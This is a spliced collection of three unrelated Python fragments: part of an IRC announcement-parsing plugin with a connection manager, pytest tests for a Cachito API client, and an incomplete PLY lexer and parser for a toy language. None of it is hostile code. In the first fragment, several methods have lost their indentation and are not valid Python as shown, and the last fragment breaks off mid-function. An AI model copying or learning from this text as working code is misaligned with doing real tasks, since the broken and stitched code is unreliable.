        handle multiline announcements.
        :param msg: IRCMessage object
        :return:
        """
        nickname = msg.from_nick
        channel = msg.arguments[0]
        # Only channel messages are announcements; ignore private messages
        if not irc_bot.is_channel(channel):
            log.debug('Received msg is not a channel msg: %s', msg)
            return
        # set some defaults
        self.line_cache.setdefault(channel, {})
        self.line_cache[channel].setdefault(nickname, [])
        self.line_cache[channel][nickname].append(msg.arguments[1])
        if not self.processing_message:
            # Schedule a parse of the message in 1 second (for multilines)
            self.schedule.queue_command(1, partial(self.process_message, nickname, channel))
            self.processing_message = True
    def process_message(self, nickname, channel):
        """
        Pops lines from the line cache and passes them to be parsed

        :param str nickname: Nickname of who sent the message
        :param str channel: Channel where the message originated from
        :return: None
        """
        # If we have announcers defined, ignore any messages not from them
        if self.announcer_list and nickname not in self.announcer_list:
            log.debug('Ignoring message: from non-announcer %s', nickname)
            return
        # Clean up the messages
        lines = [MESSAGE_CLEAN.sub('', line) for line in self.line_cache[channel][nickname]]
        log.debug('Received line(s): %s', u'\n'.join(lines))
        # Generate some entries: tracker patterns take precedence over the
        # generic "find a url in the line" fallback
        if self.linepatterns:
            entries = self.entries_from_linepatterns(lines)
        elif self.multilinepatterns:
            entries, lines = self.entries_from_multilinepatterns(lines)
        else:
            entries = self.entries_from_lines(lines)
        for entry in entries:
            # Process the generated entry through the linematched rules
            if self.tracker_config is not None and entry:
                entry.update(self.process_tracker_config_rules(entry))
            elif self.tracker_config is not None:
                log.error('Failed to parse message(s).')
                return
            entry['title'] = entry.get('irc_torrentname')
            entry['url'] = entry.get('irc_torrenturl')
            log.debug('Entry after processing: %s', dict(entry))
            if not entry['url'] or not entry['title']:
                log.error('Parsing message failed. Title=%s, url=%s.', entry['title'], entry['url'])
                continue
            log.verbose('IRC message in %s generated an entry: %s', channel, entry)
            self.queue_entry(entry)
        # reset the line cache (multiline parsing may leave unconsumed lines
        # behind for the next scheduled run)
        if self.multilinepatterns and lines:
            self.line_cache[channel][nickname] = lines
            log.debug('Left over lines: %s', '\n'.join(lines))
        else:
            self.line_cache[channel][nickname] = []
        self.processing_message = False
def entries_from_linepatterns(self, lines):
"""
:param lines: list of lines from irc
:return list: list of entries generated from lines
"""
entries = []
for line in lines:
# If it's listed in ignore lines, skip it
for rx, expected in self.ignore_lines:
if rx.match(line) and expected:
log.debug('Ignoring message: matched ignore line')
continue
entry = Entry(irc_raw_message=line)
match = self.match_message_patterns(self.linepatterns, line)
# Generate the entry and process it through the linematched rules
if not match:
log.error('Failed to parse message. Skipping.')
continue
entry.update(match)
entries.append(entry)
return entries
    def entries_from_multilinepatterns(self, lines):
        """
        Parse multi-line announcements into entries: each entry is assembled by
        matching the ordered multilinepatterns against consecutive lines.
        Lines that could belong to an announcement still in progress are
        returned so the caller can retry them on the next run.

        :param lines: list of lines
        :return: tuple (list of entries generated, list of leftover lines)
        """
        entries = []
        rest = []  # contains the rest of the lines
        while len(lines) > 0:
            entry = Entry()
            raw_message = ''
            matched_lines = []
            for idx, (rx, vals, optional) in enumerate(self.multilinepatterns):
                log.debug('Using pattern %s to parse message vars', rx.pattern)
                # find the next candidate line
                line = ''
                for l in list(lines):
                    # skip ignored lines
                    for ignore_rx, expected in self.ignore_lines:
                        if ignore_rx.match(l) and expected:
                            log.debug('Ignoring message: matched ignore line')
                            lines.remove(l)
                            break
                    else:
                        # l matched no ignore line: use it as the candidate
                        line = l
                        break
                raw_message += '\n' + line
                match = self.match_message_patterns([(rx, vals, optional)], line)
                if match:
                    entry.update(match)
                    matched_lines.append(line)
                    lines.remove(line)
                elif optional:
                    log.debug('No match for optional extract pattern found.')
                elif not line:
                    # ran out of lines mid-announcement; keep what we had for later
                    rest = matched_lines + lines
                    break
                elif idx == 0:  # if it's the first regex that fails, then it's probably just garbage
                    log.error('No matches found for pattern %s', rx.pattern)
                    lines.remove(line)
                    rest = lines
                    break
                else:
                    log.error('No matches found for pattern %s', rx.pattern)
                    rest = lines
                    break
            else:
                # all patterns processed without break: the entry is complete
                entry['irc_raw_message'] = raw_message
                entries.append(entry)
                continue
        return entries, rest
def entries_from_lines(self, lines):
"""
:param lines: list of lines
:return list: list of entries generated from lines
"""
entries = []
for line in lines:
entry = Entry(irc_raw_message=line)
# Use the message as title
entry['title'] = line
# find a url...
url_match = URL_MATCHER.findall(line)
if url_match:
# We have a URL(s)!, generate an entry
urls = list(url_match)
url = urls[-1]
entry.update({
'urls': urls,
'url': url,
})
if not entry.get('url'):
log.error('Parsing message failed. No url found.')
continue
entries.append(entry)
return entries
def is_connected(self):
return self.connected
def stop(self, wait):
if self.is_connected() and wait:
self.inject_before_shutdown = True
self.quit()
class IRCConnectionManager(object):
    """Supervisor for all IRCConnection threads.

    Starts the configured connections, periodically revives threads that died
    unexpectedly (with extra back-off when a connection was throttled), and
    applies config updates by restarting only the affected connections.
    Operates on the module-level `irc_connections` dict.
    """
    def __init__(self, config):
        # config: mapping of connection name -> per-connection config dict
        self.config = config
        self.shutdown_event = threading.Event()
        # Whether stop() should let connections finish queued work first
        self.wait = False
        # Extra reconnect delay (seconds) applied when a connection was throttled
        self.delay = 30
        self.thread = create_thread('irc_manager', self)
        self.thread.start()
    def is_alive(self):
        # True while the supervisor thread is running
        return self.thread and self.thread.is_alive()
    def start(self):
        """
        Checks for dead threads and attempts to restart them. If the connection appears to be throttled, it won't
        attempt to reconnect for 30s.
        :return:
        """
        global irc_connections
        self.start_connections()
        schedule = {}  # used to keep track of reconnection schedules
        while not self.shutdown_event.is_set():
            for conn_name, conn in irc_connections.items():
                # Don't want to revive if connection was closed cleanly
                if not conn.running:
                    continue
                now = datetime.now()
                # Attempt to revive the thread if it has died. conn.running will be True if it died unexpectedly.
                # NOTE(review): `not conn` looks unreachable for live IRCConnection
                # objects (they are always truthy) — confirm original intent.
                if not conn and self.config.get(conn_name):
                    try:
                        self.restart_connection(conn_name, self.config[conn_name])
                    except IOError as e:
                        log.error(e)
                elif not conn.is_alive() and conn.running:
                    if conn_name not in schedule:
                        schedule[conn_name] = now + timedelta(seconds=5)
                        # add extra time if throttled
                        if conn.throttled:
                            schedule[conn_name] += timedelta(seconds=self.delay)
                    # is it time yet?
                    if schedule[conn_name] <= now:
                        log.error('IRC connection for %s has died unexpectedly. Restarting it.', conn_name)
                        try:
                            self.restart_connection(conn_name, conn.config)
                        except IOError as e:
                            log.error(e)
                        # remove it from the schedule
                        del schedule[conn_name]
            time.sleep(1)
        # Shutdown requested: stop everything and clear the registry
        self.stop_connections(self.wait)
        irc_connections = {}
    def restart_connections(self, name=None):
        # Restart one named connection, or all of them when name is None
        if name:
            self.restart_connection(name)
        else:
            for name, connection in irc_connections.items():
                self.restart_connection(name, connection.config)
    def restart_connection(self, name, config=None):
        # Replace the connection object entirely; reuse its old config by default
        if not config:
            config = irc_connections[name].config
        if irc_connections[name].is_alive():
            self.stop_connection(name)
        irc_connections[name] = IRCConnection(config, name)
        irc_connections[name].thread.start()
    def start_connections(self):
        """
        Start all the irc connections. Stop the daemon if there are failures.
        :return:
        """
        # First we validate the config for all connections including their .tracker files
        for conn_name, config in self.config.items():
            try:
                log.info('Starting IRC connection for %s', conn_name)
                conn = IRCConnection(config, conn_name)
                irc_connections[conn_name] = conn
                config_hash['names'][conn_name] = get_config_hash(config)
            except (MissingConfigOption, TrackerFileParseError, TrackerFileError, IOError) as e:
                log.error(e)
                if conn_name in irc_connections:
                    del irc_connections[conn_name]  # remove it from the list of connections
        # Now we can start
        for conn_name, connection in irc_connections.items():
            connection.thread.start()
    def stop_connections(self, wait, name=None):
        # Stop one named connection, or all of them when name is None
        if name:
            self.stop_connection(name, wait)
        else:
            for name in irc_connections.keys():
                self.stop_connection(name, wait)
    def stop_connection(self, name, wait=False):
        # Join with a timeout so a hung connection can't block shutdown forever
        if irc_connections[name].is_alive():
            irc_connections[name].stop(wait)
            irc_connections[name].thread.join(11)
    def stop(self, wait):
        # Signal the supervisor loop in start() to exit
        self.wait = wait
        self.shutdown_event.set()
    def status(self, name=None):
        """Return a list of status dicts for one or all connections.

        :raises ValueError: if *name* is given but unknown.
        """
        status = []
        if name:
            if name not in irc_connections:
                raise ValueError('%s is not a valid irc connection' % name)
            else:
                status.append(self.status_dict(name))
        else:
            for n in irc_connections.keys():
                status.append(self.status_dict(n))
        return status
    def status_dict(self, name):
        # Snapshot of a single connection's liveness, channels and server info
        status = {name: {}}
        connection = irc_connections[name]
        status[name]['alive'] = connection.is_alive()
        status[name]['channels'] = [{key: value} for key, value in connection.channels.items()]
        status[name]['connected_channels'] = connection.connected_channels
        status[name]['server'] = connection.servers[0]
        status[name]['port'] = connection.port
        return status
    def update_config(self, config):
        """Apply a new config: build changed connections, drop removed ones,
        swap in the rebuilt ones. Aborts (leaving old connections running)
        if any new connection fails to construct."""
        new_irc_connections = {}
        removed_connections = set(self.config.keys()) - set(config.keys())
        for name, conf in config.items():
            # NOTE: `hash` shadows the builtin; value is the per-connection config hash
            hash = get_config_hash(conf)
            if name in self.config and config_hash['names'].get(name) == hash:
                continue
            try:
                new_irc_connections[name] = IRCConnection(conf, name)
                config_hash['names'][name] = hash
            except (MissingConfigOption, TrackerFileParseError, TrackerFileError, IOError) as e:
                log.error('Failed to update config. Error when updating %s: %s', name, e)
                return
        # stop connections that have been removed from config
        for name in removed_connections:
            self.stop_connection(name)
            del irc_connections[name]
        # and (re)start the new ones
        for name, connection in new_irc_connections.items():
            if name in irc_connections:
                self.stop_connection(name)
            irc_connections[name] = connection
            connection.thread.start()
        self.config = config
@event('manager.daemon.started')
def irc_start(manager):
    # Daemon start is handled the same as a config update: (re)build connections
    irc_update_config(manager)
@event('manager.config_updated')
def irc_update_config(manager):
    """(Re)build IRC connections from the manager's current config.

    No-ops outside daemon mode, tears everything down when the irc section is
    removed, and skips the reload entirely when the config hash is unchanged.
    """
    global irc_manager, config_hash
    # Exit if we're not running daemon mode
    if not manager.is_daemon:
        return
    config = manager.config.get('irc')
    # No config, no connections
    if not config:
        log.debug('No irc connections defined in the config')
        stop_irc(manager)
        return
    if irc_bot is None:
        log.error('ImportError: irc_bot module not found. Shutting down daemon.')
        stop_irc(manager)
        manager.shutdown(finish_queue=False)
        return
    config_hash.setdefault('names', {})
    new_config_hash = get_config_hash(config)
    if config_hash.get('config') == new_config_hash:
        log.verbose('IRC config has not been changed. Not reloading any connections.')
        return
    # FIX: the hash was stored under 'manager' while the check above reads
    # 'config', so the unchanged-config short-circuit could never trigger and
    # every config_updated event reloaded all connections.
    config_hash['config'] = new_config_hash
    if irc_manager is not None and irc_manager.is_alive():
        irc_manager.update_config(config)
    else:
        irc_manager = IRCConnectionManager(config)
@event('manager.shutdown_requested')
def shutdown_requested(manager):
    # Graceful shutdown: let connections finish queued work (wait=True)
    stop_irc(manager, wait=True)
@event('manager.shutdown')
def stop_irc(manager, wait=False):
    """Stop the IRC manager and join its thread (unless called from it)."""
    if irc_manager is not None and irc_manager.is_alive():
        log.info('Shutting down IRC.')
        irc_manager.stop(wait)
        # this check is necessary for when the irc manager is the one shutting down the daemon
        # a thread can't join itself
        if not threading.current_thread() == irc_manager.thread:
            # It's important to give the threads time to shut down to avoid socket issues later (eg. quick restart)
            irc_manager.thread.join(len(irc_connections.keys()) * 11)
@event('config.register')
def register_plugin():
    # Register the 'irc' root config key with its JSON schema
    register_config_key('irc', schema)
| |
"""
Copyright (c) 2019 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
from __future__ import absolute_import
from atomic_reactor.utils.cachito import (
CachitoAPI, CachitoAPIInvalidRequest, CachitoAPIRequestTimeout, CachitoAPIUnsuccessfulRequest)
from requests.exceptions import HTTPError
import flexmock
import pytest
import responses
import json
import os.path
import re
import time
from datetime import datetime
from textwrap import dedent
# Fixed fixtures shared by every test: a fake Cachito instance plus one
# canonical request (id, download endpoint, and the git repo/ref it is for).
CACHITO_URL = 'http://cachito.example.com'
CACHITO_REQUEST_ID = 123
CACHITO_REQUEST_DOWNLOAD_URL = \
    '{}/api/v1/requests/{}/download'.format(CACHITO_URL, CACHITO_REQUEST_ID)
CACHITO_REQUEST_REF = 'e1be527f39ec31323f0454f7d1422c6260b00580'
CACHITO_REQUEST_REPO = 'https://github.com/release-engineering/retrodep.git'
@responses.activate
@pytest.mark.parametrize('additional_params', (
    {},
    {'flags': ['spam', 'bacon']},
    {'pkg_managers': ['gomod']},
    {'pkg_managers': []},
    {'pkg_managers': None},
    {'user': 'ham'},
    {'dependency_replacements': [{
        'name': 'eample.com/repo/project',
        'type': 'gomod',
        'version': '1.1.1',
        }]
    },
    {'packages': {'npm': [{'path': 'client'}]}},
    {'packages': None},
))
def test_request_sources(additional_params, caplog):
    """request_sources POSTs repo/ref plus extras (None values omitted) and logs the response."""
    response_data = {'id': CACHITO_REQUEST_ID}
    def handle_request_sources(http_request):
        # Server-side assertions on the request body the client sent
        body_json = json.loads(http_request.body)
        assert body_json['repo'] == CACHITO_REQUEST_REPO
        assert body_json['ref'] == CACHITO_REQUEST_REF
        for key, value in additional_params.items():
            if value is not None:
                assert body_json[key] == value
            else:
                # None-valued extras must be dropped entirely, not sent as null
                assert key not in body_json
        return (201, {}, json.dumps(response_data))
    responses.add_callback(
        responses.POST,
        '{}/api/v1/requests'.format(CACHITO_URL),
        content_type='application/json',
        callback=handle_request_sources)
    api = CachitoAPI(CACHITO_URL)
    response = api.request_sources(CACHITO_REQUEST_REPO, CACHITO_REQUEST_REF, **additional_params)
    assert response['id'] == CACHITO_REQUEST_ID
    response_json = 'Cachito response:\n{}'.format(json.dumps(response_data, indent=4))
    # Since Python 3.7 logger adds additional whitespaces by default -> checking without them
    assert re.sub(r'\s+', " ", response_json) in re.sub(r'\s+', " ", caplog.text)
@responses.activate
@pytest.mark.parametrize(('status_code', 'error', 'error_body'), (
    (400, CachitoAPIInvalidRequest, json.dumps({'error': 'read the docs, please'})),
    (500, HTTPError, 'Internal Server Error'),
))
def test_request_sources_error(status_code, error, error_body, caplog):
    """Error responses raise the matching exception; JSON bodies get logged, others don't."""
    responses.add(
        responses.POST,
        '{}/api/v1/requests'.format(CACHITO_URL),
        content_type='application/json',
        body=error_body,
        status=status_code,
    )
    with pytest.raises(error):
        CachitoAPI(CACHITO_URL).request_sources(CACHITO_REQUEST_REPO, CACHITO_REQUEST_REF)
    try:
        response_data = json.loads(error_body)
    except ValueError:  # json.JSONDecodeError in py3
        # Non-JSON error bodies must not be echoed as a Cachito response
        assert 'Cachito response' not in caplog.text
    else:
        response_json = 'Cachito response:\n{}'.format(json.dumps(response_data, indent=4))
        # Since Python 3.7 logger adds additional whitespaces by default -> checking without them
        assert re.sub(r'\s+', " ", response_json) in re.sub(r'\s+', " ", caplog.text)
@responses.activate
@pytest.mark.parametrize('burst_params', (
    {'burst_retry': 0.01, 'burst_length': 0.5, 'slow_retry': 0.2},
    # Set the burst_length to lower than burst_retry to trigger the slow_retry :)
    {'burst_retry': 0.01, 'burst_length': 0.001, 'slow_retry': 0.01},
))
@pytest.mark.parametrize('cachito_request', (
    CACHITO_REQUEST_ID,
    {'id': CACHITO_REQUEST_ID},
))
def test_wait_for_request(burst_params, cachito_request, caplog):
    """wait_for_request polls until the request reaches 'complete' and logs it."""
    # Each poll pops the next state; last one ends the wait
    states = ['in_progress', 'in_progress', 'complete']
    updated = datetime.utcnow().isoformat()
    expected_total_responses_calls = len(states)
    expected_final_state = states[-1]
    def handle_wait_for_request(http_request):
        state = states.pop(0)
        return (200, {}, json.dumps({'id': CACHITO_REQUEST_ID, 'state': state, 'updated': updated}))
    request_url = '{}/api/v1/requests/{}'.format(CACHITO_URL, CACHITO_REQUEST_ID)
    responses.add_callback(
        responses.GET,
        request_url,
        content_type='application/json',
        callback=handle_wait_for_request)
    response = CachitoAPI(CACHITO_URL).wait_for_request(cachito_request, **burst_params)
    assert response['id'] == CACHITO_REQUEST_ID
    assert response['state'] == expected_final_state
    # One HTTP call per state transition, no extra polling
    assert len(responses.calls) == expected_total_responses_calls
    expect_in_logs = dedent(
        """\
        Request {} is complete
        Request url: {}
        """
    ).format(CACHITO_REQUEST_ID, request_url)
    # Since Python 3.7 logger adds additional whitespaces by default -> checking without them
    assert re.sub(r'\s+', " ", expect_in_logs) in re.sub(r'\s+', r" ", caplog.text)
@responses.activate
@pytest.mark.parametrize('timeout', (0, 60))
def test_wait_for_request_timeout(timeout, caplog):
    """A request stuck in 'in_progress' past the timeout raises CachitoAPIRequestTimeout."""
    request_url = '{}/api/v1/requests/{}'.format(CACHITO_URL, CACHITO_REQUEST_ID)
    updated = datetime.utcnow().isoformat()
    response_data = {'id': CACHITO_REQUEST_ID, 'state': 'in_progress', 'updated': updated}
    responses.add(
        responses.GET,
        request_url,
        content_type='application/json',
        status=200,
        body=json.dumps(response_data),
    )
    # Fake the clock so elapsed time appears to exceed any timeout immediately
    flexmock(time).should_receive('time').and_return(2000, 1000).one_by_one()
    # Hit the timeout during bursting to make the test faster
    burst_params = {'burst_retry': 0.001, 'burst_length': 0.02}
    with pytest.raises(CachitoAPIRequestTimeout):
        api = CachitoAPI(CACHITO_URL, timeout=timeout)
        api.wait_for_request(CACHITO_REQUEST_ID, **burst_params)
    in_progress_response_json = json.dumps(response_data, indent=4)
    expect_in_logs = dedent(
        """\
        Request {} not completed after {} seconds of not being updated
        Details: {}
        """
    ).format(request_url, timeout, in_progress_response_json)
    # Since Python 3.7 logger adds additional whitespaces by default -> checking without them
    assert re.sub(r'\s+', " ", expect_in_logs) in re.sub(r'\s+', " ", caplog.text)
@responses.activate
@pytest.mark.parametrize('error_state,error_reason',
                         [('failed', 'Cloning the Git repository failed'),
                          ('stale', 'The request has expired')])
def test_wait_for_unsuccessful_request(error_state, error_reason, caplog):
    """A terminal 'failed'/'stale' state raises CachitoAPIUnsuccessfulRequest and logs details."""
    states = ['in_progress', 'in_progress', error_state]
    updated = datetime.utcnow().isoformat()
    expected_total_responses_calls = len(states)
    def handle_wait_for_request(http_request):
        state = states.pop(0)
        return (200, {}, json.dumps({'state_reason': error_reason,
                                     'repo': CACHITO_REQUEST_REPO,
                                     'state': state,
                                     'ref': CACHITO_REQUEST_REF,
                                     'id': CACHITO_REQUEST_ID,
                                     'updated': updated,
                                     }))
    responses.add_callback(
        responses.GET,
        '{}/api/v1/requests/{}'.format(CACHITO_URL, CACHITO_REQUEST_ID),
        content_type='application/json',
        callback=handle_wait_for_request)
    burst_params = {'burst_retry': 0.001, 'burst_length': 0.5}
    with pytest.raises(CachitoAPIUnsuccessfulRequest):
        CachitoAPI(CACHITO_URL).wait_for_request(CACHITO_REQUEST_ID, **burst_params)
    assert len(responses.calls) == expected_total_responses_calls
    # The full final response body must appear in the error log
    failed_response_json = json.dumps(
        {'state_reason': error_reason,
         'repo': CACHITO_REQUEST_REPO,
         'state': error_state,
         'ref': CACHITO_REQUEST_REF,
         'id': CACHITO_REQUEST_ID,
         'updated': updated,
         },
        indent=4
    )
    expect_in_logs = dedent(
        """\
        Request {} is in "{}" state: {}
        Details: {}
        """
    ).format(CACHITO_REQUEST_ID, error_state, error_reason, failed_response_json)
    # Since Python 3.7 logger adds additional whitespaces by default -> checking without them
    assert re.sub(r'\s+', " ", expect_in_logs) in re.sub(r'\s+', " ", caplog.text)
@responses.activate
@pytest.mark.parametrize('error_state,error_reason',
                         [('failed', 'Cloning the Git repository failed'),
                          ('stale', 'The request has expired')])
def test_check_CachitoAPIUnsuccessfulRequest_text(error_state, error_reason, caplog):
    """The CachitoAPIUnsuccessfulRequest message includes state, reason, id, url, repo and ref."""
    states = ['in_progress', 'in_progress', error_state]
    updated = datetime.utcnow().isoformat()
    expected_total_responses_calls = len(states)
    cachito_request_url = '{}/api/v1/requests/{}'.format(CACHITO_URL, CACHITO_REQUEST_ID)
    def handle_wait_for_request(http_request):
        state = states.pop(0)
        return (200, {}, json.dumps({'state_reason': error_reason,
                                     'repo': CACHITO_REQUEST_REPO,
                                     'state': state,
                                     'ref': CACHITO_REQUEST_REF,
                                     'id': CACHITO_REQUEST_ID,
                                     'updated': updated,
                                     }))
    responses.add_callback(
        responses.GET,
        '{}/api/v1/requests/{}'.format(CACHITO_URL, CACHITO_REQUEST_ID),
        content_type='application/json',
        callback=handle_wait_for_request)
    burst_params = {'burst_retry': 0.001, 'burst_length': 0.5}
    expected_exc_text = dedent('''\
        Cachito request is in "{}" state, reason: {}
        Request {} ({}) tried to get repo '{}' at reference '{}'.
        '''.format(error_state, error_reason, CACHITO_REQUEST_ID,
                   cachito_request_url, CACHITO_REQUEST_REPO,
                   CACHITO_REQUEST_REF))
    with pytest.raises(CachitoAPIUnsuccessfulRequest) as excinfo:
        CachitoAPI(CACHITO_URL).wait_for_request(CACHITO_REQUEST_ID, **burst_params)
    assert len(responses.calls) == expected_total_responses_calls
    assert expected_exc_text in str(excinfo.value)
def test_wait_for_request_bad_request_type():
    """wait_for_request rejects arguments that are neither an id nor a request dict."""
    api = CachitoAPI(CACHITO_URL)
    with pytest.raises(ValueError, match=r'Unexpected request type'):
        api.wait_for_request('spam')
@responses.activate
@pytest.mark.parametrize('cachito_request', (
    CACHITO_REQUEST_ID,
    {'id': CACHITO_REQUEST_ID},
))
def test_download_sources(tmpdir, cachito_request):
    """download_sources saves the archive body as remote-source.tar.gz in the dest dir."""
    blob = 'glop-glop-I\'m-a-blob'
    expected_dest_path = os.path.join(str(tmpdir), 'remote-source.tar.gz')
    responses.add(
        responses.GET,
        '{}/api/v1/requests/{}/download'.format(CACHITO_URL, CACHITO_REQUEST_ID),
        body=blob)
    dest_path = CachitoAPI(CACHITO_URL).download_sources(cachito_request, str(tmpdir))
    assert dest_path == expected_dest_path
    # The file content is exactly the served body
    with open(dest_path) as f:
        assert f.read() == blob
def test_download_sources_bad_request_type(tmpdir):
    """download_sources rejects arguments that are neither an id nor a request dict."""
    dest_dir = str(tmpdir)
    with pytest.raises(ValueError, match=r'Unexpected request type'):
        CachitoAPI(CACHITO_URL).download_sources('spam', dest_dir)
@pytest.mark.parametrize('cachito_request', (
    CACHITO_REQUEST_ID,
    {'id': CACHITO_REQUEST_ID},
))
def test_assemble_download_url(tmpdir, cachito_request):
    """assemble_download_url builds the request's download endpoint URL."""
    api = CachitoAPI(CACHITO_URL)
    assert api.assemble_download_url(cachito_request) == CACHITO_REQUEST_DOWNLOAD_URL
| |
import sys
sys.path.insert(0, "../..")
from Cube import *
from Machine import *
# Py2/3 compatibility shim: under Python 3, raw_input is just input
if sys.version_info[0] >= 3:
    raw_input = input
#Define global variables
# Next free virtual address per type, one counter dict per memory segment.
# Base offsets (the INITIAL*/INTIAL* constants — typo'd names included) come
# from the star imports above; presumably Machine — TODO confirm.
globalVarCount = {} #10000
globalVarCount[BOOL] = INITIALGLOBALBOOL
globalVarCount[INT] = INITIALGLOBALINT
globalVarCount[FLOAT] = INITIALGLOBALFLOAT
globalVarCount[STRING] = INITIALGLOBALSTRING
localVarCount = {} #20000
localVarCount[BOOL] = INTIALLOCALBOOL
localVarCount[INT] = INTIALLOCALINT
localVarCount[FLOAT] = INTIALLOCALFLOAT
localVarCount[STRING] = INTIALLOCALSTRING
tempVarCount = {} #30000
tempVarCount[BOOL] = INITIALTEMPBOOL
tempVarCount[INT] = INITIALTEMPINT
tempVarCount[FLOAT] = INTIALTEMPFLOAT
tempVarCount[STRING] = INITIALTEMPSTRING
constVarCount = {} #40000
constVarCount[BOOL] = INITIALCONSTBOOL
constVarCount[INT] = INITIALCONSTINT
constVarCount[FLOAT] = INITIALCONSTFLOAT
constVarCount[STRING] = INTIALCONSTSTRING
# Intermediate-representation state built up during parsing
quadruples = []  # emitted quadruples: {'op', 'var1', 'var2', 'result'}
operandStack = []  # pending operands ({'dir', 'type'} dicts)
operationStack = []  # pending operators (plus '(' fake bottoms)
jumpStack = []  # indices of jump quadruples awaiting completion (+ 'IF' markers)
sendParams = []  # declared parameters of the function currently being called
argumentCount = 0
# Pre-registered constants; 'dir' is the virtual address in the const segment
constants = {'true':{'value':True, 'type':BOOL, 'dir':40001}, 'false':{'value':False, 'type':BOOL, 'dir':40000}, '-1':{'value':-1, 'type':INT, 'dir':42500}}
varGlobal = {}  # global symbol table: name -> {'name', 'type', 'dir'}
varLocal = {}  # symbol table of the function currently being compiled
funcGlobal = {}  # function directory
funcParameters = []
# Parser bookkeeping while reducing declarations
variableType = None
funcType = None
lastVarName = None
lastFuncName = None
funcTypeNext = False
scope = 'global'  # 'global' or 'local', switched around function bodies
# Tokens
# Reserved words map directly to their own token types (see t_ID below).
reserved = {
    'module' : 'MODULE',
    'main' : 'MAIN',
    'func' : 'FUNC',
    'print' : 'PRINT',
    'read' : 'READ',
    'if' : 'IF',
    'else' : 'ELSE',
    'elseif' : 'ELSEIF',
    'true' : 'TRUE',
    'false' : 'FALSE',
    'void' : 'VOID',
    'while' : 'WHILE',
    'bool' : 'TBOOL',
    'int' : 'TINT',
    'float' : 'TFLOAT',
    'string' : 'TSTRING',
    'return' : 'RETURN'
}
tokens = [
    'ASSIGN', 'PLUS', 'MINUS', 'TIMES', 'DIVIDE',
    'LESSTHAN', 'GREATERTHAN', 'LESSTHANEQ', 'GREATERTHANEQ', 'EQUAL', 'DIFFERENT', 'OR', 'AND',
    'LEFTBKT', 'RIGHTBKT', 'LEFTSQBKT', 'RIGHTSQBKT', 'LEFTPAREN', 'RIGHTPAREN', 'COMMA', 'SEMICOLON',
    'ID', 'NUMBERINT', 'NUMBERFLT', 'STRING'
] + list(reserved.values())
# Simple token regexes. PLY sorts string-defined tokens by decreasing regex
# length, so two-char operators ('<=', '==', ...) win over one-char ones.
t_ASSIGN = r'='
t_PLUS = r'\+'
t_MINUS = r'\-'
t_TIMES = r'\*'
t_DIVIDE = r'\/'
t_LESSTHAN = r'\<'
t_GREATERTHAN = r'\>'
t_LESSTHANEQ = r'\<='
t_GREATERTHANEQ = r'\>='
t_EQUAL = r'=='
t_DIFFERENT = r'!='
t_OR = r'\|\|'
t_AND = r'&&'
t_LEFTBKT = r'\{'
t_RIGHTBKT = r'\}'
t_LEFTSQBKT = r'\['
t_RIGHTSQBKT = r'\]'
t_LEFTPAREN = r'\('
t_RIGHTPAREN = r'\)'
t_COMMA = r'\,'
t_SEMICOLON = r'\;'
t_NUMBERINT = r'[0-9]+'
t_NUMBERFLT = r'[0-9]+\.[0-9]+'
t_ignore = " \t"
def t_ID(t):
    r'[a-z_][a-zA-Z0-9_]*'
    # Reserved words take precedence over plain identifiers
    t.type = reserved.get(t.value, 'ID')
    return t
def t_STRING(t):
    r'\".*\"'
    # String literal including the surrounding quotes (single line, greedy)
    return t
def t_newline(t):
    r'\n+'
    # Track line numbers for error reporting; no token is produced
    t.lexer.lineno += t.value.count("\n")
def t_error(t):
    # Report and skip unrecognized characters one at a time
    print("Illegal character '%s'" % t.value[0])
    t.lexer.skip(1)
# Build the lexer
import ply.lex as lex
lex.lex()
# Grammar start symbol for the parser built below
start = 'moduleg'
# For using empty
def p_empty(p):
    '''empty :'''
    pass
def p_functions(p):
    '''functions : empty
                | funcg functions'''
def p_globalVars(p):
    '''globalVars : empty
                | vars globalVars'''
def p_moduleg(p):
    '''moduleg : MODULE ID LEFTBKT globalVars jumpToMain functions maing RIGHTBKT'''
def p_vars4(p):
    '''vars4 : constant
            | PLUS constant
            | MINUS constant'''
    # Initializer value, with optional sign; '-' is prepended as text
    p[0] = p[1]
    if len(p) > 2:
        p[0] = p[2]
        if p[1] == '-':
            p[0] = '-'+p[2]
def p_vars3(p):
    '''vars3 : empty
            | LEFTSQBKT cteN RIGHTSQBKT'''
    # Optional array size suffix on a declaration
    if len(p) > 2:
        convertVariableToArray(p[2])
def p_vars2(p):
    '''vars2 : empty
            | COMMA vars1'''
def p_vars1(p):
    '''vars1 : ID addVariable vars3 ASSIGN vars4'''
    # Declaration with mandatory initializer: emit the assignment quadruple.
    # NOTE(review): assumes the initializer p[5] is a literal already present
    # in `constants` (an ID initializer would KeyError) — TODO confirm.
    var = {}
    if p[1] in varLocal.keys():
        var = varLocal[p[1]]
    else:
        var = varGlobal[p[1]]
    if '-' in p[5]:
        # Negative literal: negate via multiplication by the constant -1
        p[5] = p[5].replace('-','')
        addQuadruple('*', constants['-1']['dir'], constants[p[5]]['dir'], var['dir'])
    else:
        addQuadruple('=', constants[p[5]]['dir'], '', var['dir'])
    # NOTE(review): the type check runs after the quadruple is emitted
    if getResultType(var['type'], '=', constants[p[5]]['type']) < 0:
        print('Error: Assignment type mismatch')
        exit(1)
def p_vars(p):
    '''vars : type vars1 vars2 SEMICOLON'''
def p_func3(p):
    '''func3 : empty
            | RETURN expression funcReturn SEMICOLON
            | statute func3'''
def p_func2(p):
    '''func2 : empty
            | statute func2'''
def p_func1(p):
    '''func1 : VOID saveFuncTypeVoid ID saveFuncName LEFTPAREN parameters RIGHTPAREN funcStart LEFTBKT func2 RIGHTBKT funcEnd
            | funcTypeNext type ID saveFuncName LEFTPAREN parameters RIGHTPAREN funcStart LEFTBKT func3 RIGHTBKT funcEnd'''
def p_funcg(p):
    '''funcg : FUNC changeToLocalScope func1 changeToGlobalScope'''
def p_maing(p):
    '''maing : MAIN changeToLocalScope completeJumpToMain block'''
    # End of program: emit the terminal quadruple and dump debug state
    addQuadruple('END', '', '', '')
    print('-------- quadruples')
    for i in range(0, len(quadruples)):
        q = quadruples[i]
        print('%s {var1:%s } {op:%s } {var2:%s } {result:%s }' % (i, q['var1'], q['op'], q['var2'], q['result']))
    print('--------')
    print('-------- stacks')
    print(operandStack)
    print(operationStack)
    print(jumpStack)
    print('--------')
    print('global vars: %s' % varGlobal)
    print('functions: %s' % funcGlobal)
    print('constants: %s' % constants)
def p_block1(p):
    '''block1 : empty
            | statute block1'''
def p_block(p):
